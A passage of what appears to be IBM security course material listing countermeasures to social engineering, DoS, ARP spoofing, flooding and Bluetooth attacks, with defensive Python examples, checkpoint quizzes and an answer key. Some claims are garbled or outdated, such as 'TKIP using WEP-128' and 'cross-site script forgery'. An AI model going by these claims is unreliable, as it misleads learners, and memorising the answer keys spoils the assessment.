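    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, user, action, obj = m.groups()
        events.append({"ts": ts, "user": user, "action": action, "obj": obj,
                       "hour": int(ts[11:13])})
    return events

def detect(events, anomaly_threshold=2):
    """Return a list of (user, kind, detail) findings.
    kind is 'signature' for known misuse, 'anomaly' for baseline deviation."""
    findings = []
    deviations = defaultdict(int)
    for e in events:
        for name, rule in SIGNATURES.items():
            if rule(e):
                findings.append((e["user"], "signature", name))
        base = BASELINE.get(e["user"])
        if base is None:
            findings.append((e["user"], "anomaly", "unknown user"))
            continue
        off_prefix = not e["obj"].startswith(base["prefixes"])
        off_hours = e["hour"] not in base["hours"]
        if off_prefix or off_hours:
            deviations[e["user"]] += 1
    # A single deviation is noise; a run of them is a significant departure.
    for user, n in deviations.items():
        if n >= anomaly_threshold:
            findings.append((user, "anomaly", f"{n} accesses outside baseline"))
    return findings

if __name__ == "__main__":
    for finding in detect(parse(AUDIT_LOG)):
        print(finding)
```

Only host-side audit data is used here, in line with the note that network capture is unnecessary when insiders operate within local confines; the deletion of the audit log is caught by a signature, while the late-night copying of HR files by an engineering user is caught only by the baseline comparison.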


Countermeasures (42 of 55)

• Hacking & Social Networking Countermeasures


– Phone Attack Countermeasures: One should not disclose any personal information when such
phone call is received

• There are chances that caller ID may not tell the true identity of the caller

• The risk of a telephone based social engineer attack is high


Figure 3-52. Countermeasures (42 of 55) DS011.0

Notes:
Phone Attack Countermeasures: One should not disclose any personal information when such a phone call is received. Caller ID may not reveal the true identity of the caller, as caller ID systems can be spoofed. If personal information is requested on a call, one can hang up and then place a call back to confirm that the request for information is legitimate. This way it can be verified that the calling party belongs to a proper business or organization and that the call came from a trusted source.
The risk of a telephone-based social engineering attack is high in an organization that has someone answering phone calls all day. A social engineer is familiar with computer systems and their integration with telephone systems, caller IDs and so on, and is proficient enough to hide their identity, pose as different people and appear as legitimate as possible. An organization must be aware of the kind of phone system it uses so as to keep track of internal extensions and of the people who have access to the phone system. A solid policy for handling calls is required in an organization to prevent such attacks.


Countermeasures (43 of 55)

• Hacking & Social Networking Countermeasures


– Online Attacks Countermeasures

• Attacks can be countered by deleting the mail before it downloads any malware in the system

• They just have to get the user to click on a certain page that may trigger downloading of a script or
other credentials

• A little awareness goes a long way, as the user can recognize that the situation needs handling


Figure 3-53. Countermeasures (43 of 55) DS011.0

Notes:
Online Attacks Countermeasures: Online scams through emails asking for personal information (such as a bank account number) are a common occurrence. However, looking closely at these mails, it can be deduced that they offer no legitimacy. Such attacks can be countered by deleting the mail before it downloads any malware onto the system. Social engineers can also get into a system by way of the web: they just have to get the user to click on a certain page that may trigger the downloading of a script or the harvesting of credentials. If the user is not properly trained to identify malpractice going on in the browser, this increases the vulnerability and serves as an easy route of exploitation for a social engineer. Pop-up blockers, anti-spyware and antivirus serve as important and effective tools against such threats. However, a program is not able to detect phony pages, so the user must be made aware of these things. A little awareness goes a long way: a user who recognizes that a situation needs handling can close the browser before any malware infects the system. Users who need to be online on a regular basis should be briefed about such threats and attacks in a dedicated training session.


Countermeasures (44 of 55)

• Hacking & Social Networking Countermeasures


– Dumpster Diving Countermeasures

• It should be made sure that important confidential documents should be shredded completely

• It is recommended that the dumpster installed in an organization is well-structured

• One wouldn’t leave a credit card application with their name on it on top of the trash pile out in the
dumpster or on the side of the street


Figure 3-54. Countermeasures (44 of 55) DS011.0

Notes:
Dumpster Diving Countermeasures: Important information should be destroyed completely so that it cannot be retrieved afterwards from the remains. It should be made sure that important confidential documents are shredded completely and not left lying around carelessly. It is recommended that the dumpster installed at an organization is well-structured and equipped with a lock mechanism, and that it is kept in check which people have access to the dumpster. Simply feeding documents into a paper shredder also protects against the abuse of corporate documents. This even applies at home when going through the mail: one wouldn’t leave a credit card application with one’s name on it on top of the trash pile in the dumpster or on the side of the street for anyone to pick up and send away, and being responsible with an organization’s documents is just as important.


Countermeasures (45 of 55)

• Hacking & Social Networking Countermeasures


– Reverse Social Engineering Countermeasures

• Emails, phones, business cards can be used as media for advertising to fix the issues on behalf of
the organization

• The attacker, after the advertising stage, would finally cause the problem they claim to fix


Figure 3-55. Countermeasures (45 of 55) DS011.0

Notes:
Reverse Social Engineering Countermeasures: Reverse social engineering is an attack that is harder to detect, more intricate and more advanced than other social engineering attacks. At first, the attacker uses a passive approach to gain information, using Google or the organization’s own website. This step doesn’t necessarily qualify as a reverse social engineering attack. After learning something about the needs of the organization, the attacker advertises to fix the requisite issue. Emails, phones and business cards can be used as media for advertising to fix the issues on behalf of the organization. Posing as a representative of the organization, the attacker can fool a user. This step can be dealt with by verifying whether the concerned organization has recruited any new administrator. The attacker, after the advertising stage, would finally cause the problem they claim to fix and then wait for someone to fall for it and call them to fix the issue. Once the attacker is contacted, the user is in a position where they have to comply with the attacker’s demands. However, if the user is aware of such attacks, this scenario can be prevented. Detection of a reverse social engineering attack is a difficult task, as the attackers have done good reconnaissance. If any kind of anomaly is detected, it should be reported to a verified administrator instead of falling prey to such attacks.


Countermeasures (46 of 55)

• Hacking & Social Networking Countermeasures


– Persuasion Attempts Countermeasures

• To counter this kind of attempt, the identity of people who aren’t allowed inside the organization
should be verified

• Also, people who expect visitors to come should let everyone know via email

• Also, if there is more than one exit door (e.g. exit to a parking lot or smoking area), it should be
made sure that these doors should not be used for unauthorized entry


Figure 3-56. Countermeasures (46 of 55) DS011.0

Notes:
Persuasion Attempts Countermeasures: A social engineer’s best disguise is to fit into the crowd and pretend to belong in the organization’s environment. Thus, instead of carrying out an in-person attack that could have severe repercussions, the social engineer has to fake an identity to look like one of the people who frequent the company. To counter this kind of attempt, the identity of people who aren’t allowed inside the organization should be verified. Also, people who are expecting visitors should let everyone know via email. However, if a substantial number of visitors is encountered during a single day, this countermeasure loses its purpose. Also, if there is more than one exit door (e.g. an exit to a parking lot or smoking area), it should be made sure that these doors cannot be used for unauthorized entry. A security guard can be posted or video surveillance used to monitor these doors so that events like tailgating or suspicious people can be spotted.


Countermeasures (47 of 55)

• Wireless Network Security Countermeasures


– Against DOS

• The time taken by the database to respond increases when server resources are overloaded by a database DOS

• Query rates, connection rates and various other rates for each user of the database are limited by the server resource with the help of Connection Controls


Figure 3-57. Countermeasures (47 of 55) DS011.0

Notes:
Against DOS: Multiple levels of protection, i.e. at the network, application and database levels, are required against DOS. Focusing specifically on the database, the recommended countermeasures are response timing control, IPS, query access control and connection rate control.
- The time taken by the database to respond increases when server resources are overloaded by a database DOS.
- Query rates, connection rates and various other rates for each user of the database are limited by the server resource. This prevention step is accomplished by Connection Controls.
- Database servers can be crashed if attackers exploit platform vulnerabilities. Such attacks can be prevented by IPS and protocol validation.
- Query access control is provided by Dynamic Profiling, which can detect queries beforehand and prevent DOS attacks.
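Connection control and response timing control as listed above can be demonstrated with a small per-user limiter of the kind a database proxy or server applies in front of query execution. This is an added example written for this notebook, not code from the IBM course material or from any particular database product; the limits, user names and simulated query stream are constructed.

```python
# Added example (not from the IBM course material): a per-user connection and
# query rate limiter ("connection control") plus response-time recording
# ("response timing control") against database DOS. Limits and the sample
# query stream are constructed for illustration.
import time
from collections import deque

class RateLimiter:
    """Sliding-window limiter: at most `limit` events per `window` seconds per key."""
    def __init__(self, limit, window):
        self.limit = limit
        self.window = window
        self.events = {}  # key -> deque of event timestamps

    def allow(self, key, now):
        q = self.events.setdefault(key, deque())
        # Drop timestamps that have fallen out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True

class ConnectionControl:
    """Applies separate per-user limits to new connections and to queries, and
    records the response time of queries that do run so that slow responses
    (a symptom of overload) can be reported to the administrator."""
    def __init__(self, conn_per_min, queries_per_sec, slow_threshold):
        self.conn_limiter = RateLimiter(conn_per_min, 60.0)
        self.query_limiter = RateLimiter(queries_per_sec, 1.0)
        self.slow_threshold = slow_threshold
        self.slow_queries = []

    def open_connection(self, user, now):
        """True if the user may open another connection right now."""
        return self.conn_limiter.allow(user, now)

    def run_query(self, user, sql, now, execute):
        """Returns 'rejected' (over the rate), 'ok' or 'slow'."""
        if not self.query_limiter.allow(user, now):
            return "rejected"
        start = time.perf_counter()
        execute(sql)
        elapsed = time.perf_counter() - start
        if elapsed > self.slow_threshold:
            self.slow_queries.append((user, sql, elapsed))
            return "slow"
        return "ok"

def simulate():
    """Constructed scenario: user 'app' sends 25 queries within a quarter of a
    second while the limit is 20 per second; user 'report' sends 3.
    Returns the per-user verdict counts."""
    cc = ConnectionControl(conn_per_min=5, queries_per_sec=20, slow_threshold=0.5)
    noop = lambda sql: None  # stands in for the real query executor
    results = {"app": {"ok": 0, "rejected": 0, "slow": 0},
               "report": {"ok": 0, "rejected": 0, "slow": 0}}
    t = 1000.0
    for i in range(25):
        results["app"][cc.run_query("app", "SELECT 1", t + i * 0.01, noop)] += 1
    for i in range(3):
        results["report"][cc.run_query("report", "SELECT 1", t + i * 0.1, noop)] += 1
    return results

if __name__ == "__main__":
    print(simulate())
```

The point of keying the limits per user is that the flooding user is throttled while other users' queries still go through; a single global limit would let the attacker starve everyone.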


Countermeasures (48 of 55)

• Wireless Network Security Countermeasures


– Against Spoofing

• The MAC address appears on a port and without authentication, the mapping cannot be altered.

• A lot of congestion can be saved by making ARP request unicast

• Protection against tampering by newly forged ARP packets can be achieved by sending ARP request packets to a centralized server


Figure 3-58. Countermeasures (48 of 55) DS011.0

Notes:
Against Spoofing: ARP packets are broadcast without any authentication mechanism. This makes them susceptible to ARP poisoning or ARP spoofing. Network switches equipped with a MAC binding feature take the first MAC address that appears on a port and store it; without authentication, the mapping cannot be altered afterwards. Alternatively, ARP negotiation can be centralized, e.g. through DHCP. A lot of congestion can be saved by making ARP requests unicast. If additional authentication is introduced, the sender can be identified and security against packet tampering can be ensured. Protection against tampering by newly forged ARP packets can be achieved by sending ARP request packets to a centralized server that holds the IP-to-MAC address mapping. The server then sends an ARP response to the host, together with a strong digital signature. The server response is stored with a timestamp and an acknowledgement is sent by the host in encrypted form. Spoofing is also prevented by disabling source routing on all the routers that are used internally.
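The MAC binding behaviour described above (lock the first mapping seen, refuse later changes) is easy to show on a handful of ARP replies. The following is an added example written for this notebook, not code from the IBM course material or from any switch vendor; the port numbers, addresses and the sequence of replies are constructed, and the table is kept in memory rather than in switch hardware.

```python
# Added example (not from the IBM course material): a MAC-binding table of the
# kind a switch or a centralized ARP server keeps, applied to a constructed
# sequence of ARP replies. The first IP-to-MAC mapping seen is locked; later
# replies that try to change it are flagged and dropped instead of updating it.
from dataclasses import dataclass

@dataclass
class ArpReply:
    port: int          # switch port the frame arrived on
    sender_ip: str
    sender_mac: str

class MacBindingTable:
    def __init__(self):
        self.ip_to_mac = {}      # locked IP -> MAC mapping
        self.port_to_mac = {}    # first MAC learned on each port
        self.alerts = []         # (reason, reply) pairs for the administrator

    def process(self, reply):
        """Returns 'learned' (new binding), 'ok' (matches binding) or 'dropped'."""
        learned_mac = self.port_to_mac.setdefault(reply.port, reply.sender_mac)
        if learned_mac != reply.sender_mac:
            # A second MAC on a port whose MAC is already bound.
            self.alerts.append(("port-mac-mismatch", reply))
            return "dropped"
        bound = self.ip_to_mac.get(reply.sender_ip)
        if bound is None:
            self.ip_to_mac[reply.sender_ip] = reply.sender_mac
            return "learned"
        if bound != reply.sender_mac:
            # A host on another port claims an IP already bound elsewhere.
            self.alerts.append(("ip-mac-conflict", reply))
            return "dropped"
        return "ok"

# Constructed traffic: the gateway 10.0.0.1 is legitimately on port 1; the host
# on port 7 later claims to be 10.0.0.1, and then port 7 also shows a second MAC.
SAMPLE = [
    ArpReply(1, "10.0.0.1", "00:11:22:33:44:01"),
    ArpReply(5, "10.0.0.5", "00:11:22:33:44:05"),
    ArpReply(1, "10.0.0.1", "00:11:22:33:44:01"),
    ArpReply(7, "10.0.0.7", "00:11:22:33:44:07"),
    ArpReply(7, "10.0.0.1", "00:11:22:33:44:07"),
    ArpReply(7, "10.0.0.1", "de:ad:be:ef:00:01"),
]

def run(sample=SAMPLE):
    """Feed the sample through a fresh table; returns (verdicts, table)."""
    table = MacBindingTable()
    verdicts = [table.process(r) for r in sample]
    return verdicts, table

if __name__ == "__main__":
    verdicts, table = run()
    print(verdicts)
    for reason, reply in table.alerts:
        print(reason, reply)
```

Because the first binding wins, the table has to be populated while the network is known to be clean (or seeded from the DHCP lease table, which is the centralized alternative the notes mention); a poisoner who speaks first would otherwise be the one locked in.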


Countermeasures (49 of 55)

• Wireless Network Security Countermeasures


– Against Flooding Attack

• The queue of half-open SYN-ACK connections is relieved if the host's time-out for waiting on the handshake is decreased

• All flooding attacks can be dealt with by using an integrated force of Host-based Intrusion Detection System (HIDS) and Network-based Intrusion Detection System (NIDS)

• Critical servers and network segment(s) are placed under HIDS and NIDS, respectively.


Figure 3-59. Countermeasures (49 of 55) DS011.0

Notes:
Against Flooding Attack: If the mail server is on public web access, the nature of the incoming IP addresses cannot be determined in advance, so no solution can be put forward that simply blocks hostile IP addresses. The queue of half-open SYN-ACK connections is relieved if the host's time-out for waiting on the three-way handshake is decreased, and vendor software patches should be applied. An intrusion detection system is also an option, but by itself it does not offer a clear-cut solution.
All flooding attacks can be dealt with by using an integrated force of Host-based Intrusion Detection System (HIDS) and Network-based Intrusion Detection System (NIDS). Critical servers and network segment(s) are placed under HIDS and NIDS, respectively. The administrator can be notified immediately if any suspicious activity arises. Known attacks can be detected using a signature detection scheme. Host-based systems examine log files and intercept requests to the operating system for the resources available in the system.
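To make the HIDS/NIDS split concrete: the network-side check looks at connection state across the segment, while the host-side check applies a signature to the server's own logs. The following is an added example written for this notebook, not code from the IBM course material or from any IDS product; the connection-table snapshot, the kernel log excerpt and the threshold are constructed.

```python
# Added example (not from the IBM course material): a NIDS-style check for SYN
# flooding that counts half-open (SYN_RECV) connections per source address in a
# constructed connection-table snapshot, and a HIDS-style signature check on a
# constructed kernel log excerpt. Thresholds and sample lines are illustrative.
import re
from collections import Counter

# Constructed connection-table snapshot in netstat-like form:
# proto local_addr:port foreign_addr:port state
CONN_TABLE = """\
tcp 10.0.0.25:25 203.0.113.9:40001 SYN_RECV
tcp 10.0.0.25:25 203.0.113.9:40002 SYN_RECV
tcp 10.0.0.25:25 203.0.113.9:40003 SYN_RECV
tcp 10.0.0.25:25 203.0.113.9:40004 SYN_RECV
tcp 10.0.0.25:25 203.0.113.9:40005 SYN_RECV
tcp 10.0.0.25:25 198.51.100.7:51000 ESTABLISHED
tcp 10.0.0.25:25 198.51.100.8:51001 SYN_RECV
tcp 10.0.0.25:443 192.0.2.44:60000 ESTABLISHED
"""

CONN_RE = re.compile(r"^tcp (\S+):(\d+) (\S+):(\d+) (\S+)$")

def half_open_by_source(table_text):
    """Count SYN_RECV entries per foreign (source) address."""
    counts = Counter()
    for line in table_text.splitlines():
        m = CONN_RE.match(line)
        if m and m.group(5) == "SYN_RECV":
            counts[m.group(3)] += 1
    return counts

def syn_flood_sources(table_text, threshold=4):
    """Sources holding at least `threshold` half-open connections, busiest first."""
    counts = half_open_by_source(table_text)
    flagged = [(src, n) for src, n in counts.items() if n >= threshold]
    return sorted(flagged, key=lambda x: -x[1])

# Constructed HIDS-style kernel log excerpt: the host itself reports when its
# SYN backlog overflows, which is the host-side signature of the same attack.
KERNEL_LOG = """\
Mar  2 23:14:51 mail kernel: TCP: request_sock_TCP: Possible SYN flooding on port 25. Sending cookies.
Mar  2 23:14:52 mail sshd[2210]: Accepted publickey for ops from 198.51.100.7
"""

SYN_FLOOD_SIG = re.compile(r"Possible SYN flooding on port (\d+)")

def hids_syn_flood_ports(log_text):
    """Ports named in kernel SYN-flooding messages (signature detection)."""
    return [int(m.group(1)) for line in log_text.splitlines()
            for m in [SYN_FLOOD_SIG.search(line)] if m]

if __name__ == "__main__":
    print("NIDS flagged sources:", syn_flood_sources(CONN_TABLE))
    print("HIDS flagged ports:", hids_syn_flood_ports(KERNEL_LOG))
```

The single half-open connection from 198.51.100.8 stays below the threshold and is not reported, which is the trade-off the notes allude to: a flood spread over many spoofed sources defeats the per-source count, and the host-side signature is then the more reliable of the two signals.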


Countermeasures (50 of 55)

• Wireless Network Security Countermeasures


– Against D-DoS Attack

• Antivirus software can be installed to keep out the Email worms

• For example: an Egress (outbound) filter in the router or the network firewall does not allow spoofed packets with fake source addresses to leave the network, ensuring that whatever comes out of the network has only source addresses belonging to the network

• An Ingress (inbound) filter confirms that the source addresses of packets coming into the network are not addresses from inside the network


Figure 3-60. Countermeasures (50 of 55) DS011.0

Notes:
Against D-DoS Attack: Software vendors provide security patches which can be applied as a precaution against Distributed Denial of Service attacks. Antivirus software can be installed to keep out email worms. Another level of security against D-DoS attacks can be attained by outbound and inbound filtering at firewalls. For example, an Egress (outbound) filter in the router or the network firewall does not allow spoofed packets with fake source addresses to leave the network, ensuring that whatever comes out of the network carries only source addresses belonging to the network. An Ingress (inbound) filter confirms that the source addresses of packets coming into the network are not addresses from inside the network. An unsophisticated attack is accompanied by traffic with a specific signature. If a large volume of traffic originates from one service provider, a portion of legitimate activity can be allowed through by temporarily blocking the traffic that has come from a certain source; the damage that occurs while the traffic is being blocked, however, cannot be avoided. Below are the steps which can prevent a network from being used to attack another network:
- Packets coming into the network that are addressed to a broadcast address must be filtered
- In order to prevent smurf attacks, it must be made sure that broadcast forwarding is turned off on all the internal routers
- If a packet entering the network has a source address that originates in the network itself, the packet must be blocked
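The egress, ingress and broadcast rules above reduce to three address comparisons against the network's own prefix. The following is an added example written for this notebook, not code from the IBM course material or from any firewall product; the internal prefix 192.0.2.0/24 and the packet records are constructed, and the filter works on address tuples rather than real frames.

```python
# Added example (not from the IBM course material): the ingress/egress and
# broadcast filtering rules described above, applied to constructed packet
# records. The internal prefix and the packets are made up for illustration.
import ipaddress

INTERNAL = ipaddress.ip_network("192.0.2.0/24")  # constructed internal network

def egress_filter(src, internal=INTERNAL):
    """Outbound: only packets whose source address belongs to the network may
    leave, so the network cannot emit spoofed traffic. True means allowed."""
    return ipaddress.ip_address(src) in internal

def ingress_filter(src, dst, internal=INTERNAL):
    """Inbound: drop packets claiming an internal source (spoofed) and packets
    aimed at the network's broadcast address (smurf amplification).
    True means allowed."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if s in internal:
        return False
    if d == internal.broadcast_address:
        return False
    return True

def apply_rules(packets):
    """packets: list of (direction, src, dst) with direction 'in' or 'out'.
    Returns a list of (packet, verdict) pairs."""
    out = []
    for direction, src, dst in packets:
        if direction == "out":
            ok = egress_filter(src)
        else:
            ok = ingress_filter(src, dst)
        out.append(((direction, src, dst), "allow" if ok else "drop"))
    return out

# Constructed traffic sample.
PACKETS = [
    ("out", "192.0.2.10", "198.51.100.5"),    # legitimate outbound
    ("out", "203.0.113.77", "198.51.100.5"),  # spoofed source leaving the network
    ("in", "198.51.100.5", "192.0.2.10"),     # legitimate inbound
    ("in", "192.0.2.44", "192.0.2.10"),       # inbound packet claiming internal source
    ("in", "198.51.100.9", "192.0.2.255"),    # inbound to the broadcast address
]

if __name__ == "__main__":
    for packet, verdict in apply_rules(PACKETS):
        print(verdict, packet)
```

The egress rule protects other networks from this one, which is why the notes list it as a step that prevents a network from attacking another network; the ingress rule protects this network from spoofed and amplified traffic coming in.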


Countermeasures (51 of 55)

• Wireless Network Security Countermeasures


– Against Eavesdropping

• Access control can be implemented by using IEEE802.1x security protocol

• Security protocols divide the network into authentication server, authenticator and supplicant such
that when looked into a wireless network

• Since there is an involvement of the usage of a RADIUS server in EAP (Extensible Authentication
Protocol) authentication


Figure 3-61. Countermeasures (51 of 55) DS011.0

Notes:
Against Eavesdropping: The quality of authentication and encryption should be good, so as to prevent leakage of data. Access control can be implemented using the IEEE 802.1x security protocol. Also, to prevent eavesdropping, it should be ensured that 802.1x RADIUS authentication is activated and data is encrypted with TKIP using WEP-128 bit encryption. Security protocols divide the network into authentication server, authenticator and supplicant; in a wireless network, the wireless device is the supplicant, the Remote Authentication Dial-In User Service (RADIUS) server acts as the authentication server and the access point (AP) is the authenticator. Since EAP (Extensible Authentication Protocol) authentication involves a RADIUS server, it acts as a secondary layer of protection. EAP is used for the communication between the authenticator and the supplicant by the port-based authentication of IEEE 802.1x. EAP verifies that a user is recognized and authenticated before the server grants wireless access, making EAP a user-based authentication that provides enterprise-level security to the network. Protected EAP with MSCHAPv2 authentication can also be used to increase the level of security. Regular checks should be made for signal leaks outside the building, and any leakage should be eliminated or reduced by adjusting the transmitter power.


Countermeasures (52 of 55)

• Bluetooth Device Countermeasures


– Bluetooth PIN

• It can also be used to generate keys between two devices

– Device Authentication

• Incorporating application-level software that requires password authentication to secure the device
will add an extra layer of security


Figure 3-62. Countermeasures (52 of 55) DS011.0

Notes:
Bluetooth Device
Bluetooth technical countermeasures fall into two categories: hardware and software security solutions. Software solutions focus on device authentication and the PIN, while the link keys and the device address of the Bluetooth device are the main areas of focus for hardware solutions.
Bluetooth PIN: Bluetooth devices use a PIN to authenticate the device. The key generation process is driven by the PIN, and it can also be used to generate keys between two devices. It is essential that security administrators ensure that Bluetooth devices use PINs other than the default or lowest setting (e.g., 000).
Device Authentication: Since a Bluetooth device can store and automatically access link-level PINs from memory, a Bluetooth device should employ device authentication as an extra layer of security. Incorporating application-level software that requires password authentication to secure the device will add an extra layer of security.


Countermeasures (53 of 55)

• Bluetooth Device Countermeasures


– Frequency Hopping: FHSS is inherent in the Bluetooth design

• This solution is not completely reliable as it provides only very low degree of protection in reality

– Biometrics

– Other Measures


Figure 3-63. Countermeasures (53 of 55) DS011.0

Notes:
Frequency Hopping: FHSS is inherent in the Bluetooth design. It is a hardware solution that allows devices to communicate even in areas of very high electromagnetic interference. However, one should not rely completely on this solution, as in reality it provides only a very low degree of protection.
Biometrics: Biometrics is another type of hardware solution for securing a Bluetooth device. Voice authentication is the best biometric solution available to reduce Bluetooth vulnerabilities.
Other Measures: Some of the current software solutions available for Bluetooth include Acter AG, ActerBlue, Blue-socket, Blue Access, BlueShield, Blue Cell, etc.


Countermeasures (54 of 55)

• Bluetooth Device Countermeasures


– Blue-Bugging: The countermeasures for a Blue-Bugging attack are as follows:

• Automatic power off capability

• Using RF signatures

– Updating latest firmware/software on vulnerable Bluetooth devices


Figure 3-64. Countermeasures (54 of 55) DS011.0

Notes:
Blue-Bugging: The countermeasures for a Blue-Bugging attack are as follows:
Automatic power off capability: Bluetooth devices with fixed PIN codes should turn their power off automatically if no connection is made successfully within a predefined connection time.
Using RF signatures: Alien RF signatures are distinguished from legitimate ones using a sample RF signature from each legitimate device. This technique works because every transmitter has a unique RF signature, which is used to tell legitimate and alien RF signatures apart. Prior to accepting any connection, signal processing capabilities can be employed in Bluetooth devices to check for alien RF signatures. This technique, however, has a cost factor if multiple Bluetooth devices need to be supported.
Updating latest firmware/software on vulnerable Bluetooth devices: After the bad software implementations by mobile phone manufacturers in the summer of 2004, it was reported that the Bluetooth security flaws present in the authentication and data transfer mechanisms were fixed, and hence Bluetooth mobile software after that was assumed safe. It is necessary to install the latest software on Bluetooth devices that present any vulnerability.


Countermeasures (55 of 55)

• Bluetooth Device Countermeasures


– Bluejacking

• It is extremely important for mobile phone users across the globe to be prepared with some effective countermeasures

• One of the most effective countermeasures against bluejacking is to simply disable Bluetooth on a
mobile phone by going into options


Figure 3-65. Countermeasures (55 of 55) DS011.0

Notes:
Bluejacking: Bluejacking is probably one of the easiest and most commonly executed mobile phone related attacks. Hence, it has become extremely important for mobile phone users across the globe to be prepared with some effective countermeasures. One of the most effective countermeasures against bluejacking is to simply disable Bluetooth on the mobile phone in its options. Unfortunately, this also means that the user will no longer be able to use any Bluetooth-enabled accessories or devices with their mobile phone. A more practical countermeasure is to configure the Bluetooth settings and put the phone in Undiscoverable or Hidden mode. Once the user has paired their mobile phone with the Bluetooth-enabled devices or accessories they want to use it with, they can set its options to Undiscoverable or Hidden mode. This will ensure that when an attacker searches for Bluetooth devices, the mobile phone will not show up, while the user can continue using Bluetooth on the phone to connect to other devices. Depending on the mobile phone manufacturer, the following steps can be followed to put a phone in Undiscoverable mode:
• Select the Menu button to browse to the Bluetooth menu > Bluetooth Settings.
• Select the My phone’s Visibility option and set it to the Hidden mode.
• Especially when one is in a crowded public place, one’s level of alertness should only increase. When one receives the warning prompt that a new contact or business card has been received, one can prevent bluejacking by simply not accepting that incoming message.


• It is also a very good idea to change the name that the phone displays to other Bluetooth devices. If one retains the default name, then it makes it easier for attackers to find specific private information about a phone, like manufacturer, version, etc. Moreover, it allows an attacker to easily identify whether a phone is vulnerable or not.
• There is no permanent solution that a user can implement to counter Bluejacking without the help of the mobile phone handset manufacturers.


Checkpoint (1 of 4)

1. What is the role of a countermeasure?


– To analyse the threats
– To store data in case of a threat
– To assess the vulnerability in a system
– To minimize and mitigate the risks and thus the amount of data breaches are minimized substantially

2. Which of the following is a countermeasure against malware?


– DMZ
– Anti-virus
– Biometric
– All of the above


Figure 3-66. Checkpoint (1 of 4) DS011.0

Notes:
Write down your answers here
1. …
2. …


Checkpoint (2 of 4)

3. What is the function of connection control?
   – It prevents server resource overload by limiting connection rates, query rates, and other variables for each database user
   – It prevents attackers from exploiting known software vulnerabilities to create DOS. Buffer overflow, for example, is a common platform vulnerability that may be exploited to crash database servers
   – It provides query access control to detect any unauthorized queries that may lead to DOS. DOS attacks targeting platform vulnerabilities, for example, would be likely to trigger both IPS and Dynamic Profile violations
   – It overloads server resources, leading to delayed database responses

4. What is the function of IPS and Protocol Validation?
   – It prevents server resource overload by limiting connection rates, query rates, and other variables for each database user
   – It prevents attackers from exploiting known software vulnerabilities to create DOS. Buffer overflow, for example, is a common platform vulnerability that may be exploited to crash database servers
   – It provides query access control to detect any unauthorized queries that may lead to DOS. DOS attacks targeting platform vulnerabilities, for example, would be likely to trigger both IPS and Dynamic Profile violations
   – It overloads server resources, leading to delayed database responses


Figure 3-67. Checkpoint (2 of 4) DS011.0

Notes:
Write down your answers here
3. …
4. …


Checkpoint (3 of 4)

5. What is the function of Dynamic Profiling?
   – It prevents server resource overload by limiting connection rates, query rates, and other variables for each database user
   – It prevents attackers from exploiting known software vulnerabilities to create DOS. Buffer overflow, for example, is a common platform vulnerability that may be exploited to crash database servers
   – It provides query access control to detect any unauthorized queries that may lead to DOS. DOS attacks targeting platform vulnerabilities, for example, would be likely to trigger both IPS and Dynamic Profile violations
   – It overloads server resources, leading to delayed database responses

6. Which of the following is a countermeasure for cross-site script forgery?
   – Check and validate all form fields, hidden fields, headers, cookies, query strings, and parameters against a rigorous specification
   – Implement a stringent security policy
   – Filter the script output to defeat XSS vulnerabilities and prevent them from being transmitted to users
   – All of the above


Figure 3-68. Checkpoint (3 of 4) DS011.0

Notes:
Write down your answers here
5. …
6. …


Checkpoint (4 of 4)

7. What is the full form of DMZ?


– Decentralized Mantrap Zone
– Demilitarized Metric Zone
– Demilitarized Zoom
– Demilitarized Zone

8. What is the full form of IPS?


– Intrusion Protection System
– Intruder Prevention System
– Intrusion Prevention System
– None of the above

9. Which type of fire extinguisher is used against paper and wood fire?
– Type A
– Type B
– Type C
– Type E


Figure 3-69. Checkpoint (4 of 4) DS011.0

Notes:
Write down your answers here
7. …
8. …
9. …


Unit summary

Having completed this unit, you should be able to:
• Understand the trends of emerging threats
• Recognize the importance of information protection
• Enumerate the countermeasures associated with the different fields of security


Figure 3-70. Unit summary DS011.0

Notes:

Appendix A. Checkpoint solutions

Unit 1, "Data Security Threats"

Solutions for Figure 1-84, "Checkpoint (1 of 4)," on page 1-87

Checkpoint solutions (1 of 4)

1. Bluebugging is associated to which wireless device?


– Infrared
– Wi-Fi
– The answer is Bluetooth
– ZigBee

2. Which bug forced Amazon reboot its EC2 instances?


– The answer is Xen bug
– Shellshock bug
– Heartbleed bug
– Software bug

3. The art of manipulating people so they give up confidential information is called?


– Hacking
– The answer is Social engineering
– Packet Sniffing
– Phishing


Solutions for Figure 1-85, "Checkpoint (2 of 4)," on page 1-88

Checkpoint solutions (2 of 4)

4. Frequency Analysis is included in which technique?


– The answer is Code-breaking technique
– Code-attacking technique
– Code-simplifying technique
– Code-revealing technique

5. A resource is changed or deleted without authorization in?


– Spoofing
– Repudiation
– The answer is Tampering
– Fuzzing

6. In which technique values and actions are inserted unexpectedly as an application’s input
to crash it down?
– Spoofing
– Repudiation
– Tampering
– The answer is Fuzzing

Solutions for Figure 1-86, "Checkpoint (3 of 4)," on page 1-89

Checkpoint solutions (3 of 4)

7. Which of the following is a cryptographic threat?


– Bluebugging
– Hacking and Social Engineering Threat
– Botnets
– The answer is Birthday Attack

8. Which of the following is a network based threat?


– Bluebugging
– Hacking and Social Engineering Threat
– The answer is Botnets
– Tampering


Solutions for Figure 1-87, "Checkpoint (4 of 4)," on page 1-90

Checkpoint solutions (4 of 4)

9. Polymorphic is a?
– The answer is Virus
– Worms
– Trojan
– Bug

10. Which are the two different channels which are most vulnerable in the modern times?
– Physical storage and Data networks
– Data storage and Physical networks
– The answer is All of the above
– None of the above


Unit 2, "Data Security Threat Techniques"

Solutions for Figure 2-70, "Checkpoint (1 of 4)," on page 2-79

Checkpoint solutions (1 of 4)

1. Malware threat technique can be carried out in how many steps?


– 4
– The answer is 5
– 3
– 7

2. Which of the following options shows the steps of the malware threat technique in the correct order?
– The answer is Entry, Distribution, Exploit, Infect, Execute
– Distribution, Entry, Exploit, Infect, Execute
– Exploit, Entry, Exploit, Infect, Execute
– Infect, Entry, Exploit, Infect, Execute

3. Which of the following is a step of phishing?


– Fake login page
– Creating phishing.php file
– Creating index.html page
– The answer is All of the above


Solutions for Figure 2-71, "Checkpoint (2 of 4)," on page 2-80

Checkpoint solutions (2 of 4)

4. Which of the following options shows the steps of session hijacking in the correct order?
   – The answer is Tracking the Connection, Desynchronizing the Connection, Injecting the Attacker’s Packet
